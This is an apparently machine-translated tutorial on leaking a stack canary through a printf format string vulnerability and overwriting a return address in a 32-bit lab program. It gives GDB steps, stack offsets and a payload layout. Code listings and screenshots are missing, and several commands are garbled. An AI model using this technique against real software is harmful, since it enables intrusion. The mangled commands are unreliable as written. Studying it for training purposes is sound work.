Shulou(Shulou.com)06/01 Report--

0x00 article video:

If the text is too boring, you can watch online video: https://edu.51cto.com/sd/16514

0x01 fundamentals:

In C language, printf is used by printf (format,). Printf is a rare variable parameter library function in c language. Printf cannot know how many parameters are passed before calling. (in 32-bit assembly, the parameters are all pushed into the stack, that is, printf does not know how many parameters are on the stack.), for example, printf ("My name is% s% s"), where format specifies two parameters to be passed, but we have not passed them. At this point, printf will go to the high-address four-byte data in the stack to populate% s, that is, the value of format+4,format+8.

Here's an example:

Compilation: gcc-M32-O0 base.c-o. / base is compiled to 32-bit.

This is our test code. The corresponding value of% s is not passed to printf in printf. Let's take a look at the execution effect:

You will find that we didn't pass the str variable, but we printed it anyway. Let's debug it with GDB to see if it is populated with the format+4 address as we mentioned earlier.

When the assembly code executes to printf, we pause to look at the data in the stack:

The format data is 0x8048580, which corresponds to the position in the stack space: 0xffffd5c0, and the value corresponding to the previously calculated format+4 is Margin, so we verify it successfully.

Using this idea, we can consider that since% s can be used to print the contents of stack space, whether all the contents of stack space can be printed. When I use% s, I print format+4, then I use two% s% s to print the contents of format+4,format+8, and so we can print all the values of stack space. Next, let's use an experiment to test our idea.

What we need to do next is to use the formatting vulnerability of printf to disclose the value of canary to achieve the purpose of bypass.

Step 1: let's analyze the c language code first.

The func function in the code has a printf function, and there is a formatting string vulnerability, which should be written normally as printf ("My name is% s", name).

Compile: gcc-fstack-protector-M32-o0c.c-o. / c

Step 2: confirm the location of the canary (offset)

The idea is: first find the location x of our input, find the canary location y, and then get the offset

Break point at printf location: B printf

Execute r to run the program in gdb, and then type aaaa (write here at will, the meaning of writing aaaa is that it is easy to find in the stack space, all 61616161)

1. Print the value of ebp and save the value of ebp when the function is running, so we just need to find it while the function is running. Execute the command disass func to view the assembly code of the func function and break the point at the location of 0x080484ea, because the value of gs:0x14 is the value of Canary.

Break point: B * 0x080484ea, execute here, enter n twice, execute mov dword ptr [ebp-0xc], and the value of canary is in eax after eax.

You can see that the value of canary is 0xb26f7f00

We break point b printf, then execute c to that breakpoint (we enter margin in the middle)

1. Find the location of canary in the stack: P $ebp (because canary is near ebp)

Find the location of ebp in the stack and execute: stack 0x28 (meaning to look at forty rows of stack data)

We know that the layout in the stack frame space is as follows:

You can see the position of canary in 0xffffd5ec, and the margin string we entered is in 0xffffd5b0 position, but it points to 0xffffd5cc, so we can calculate the distance of margin string we entered, canary:0xffffd5ec-0xffffd5cc = 32, so we need 32 characters to overwrite canary.

Part III: dynamic acquisition of canary

Now that we know the offset of canary, but we don't know the dynamic value of canary, we need to use the formatting vulnerability of the printf function (recall the format+4 mentioned earlier). In the above screenshot, we can see that the first parameter of printf is 15 from canary, so we can enter xxxxxxxxxxxxxxx to get the value of canary (the last 8 digits are canary), or simplify the writing of $08x.

Step 4: get shell

In the program, we already know that there is an exploit function that allows us to get shell directly, so we can simply overwrite the return address of the func function as exploit.

From the screenshot of the above step, we can see that canary to ebp is 12, so payload is:

'a' * 32 + canary +'a' * 12 + exploit address

The python code is:

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.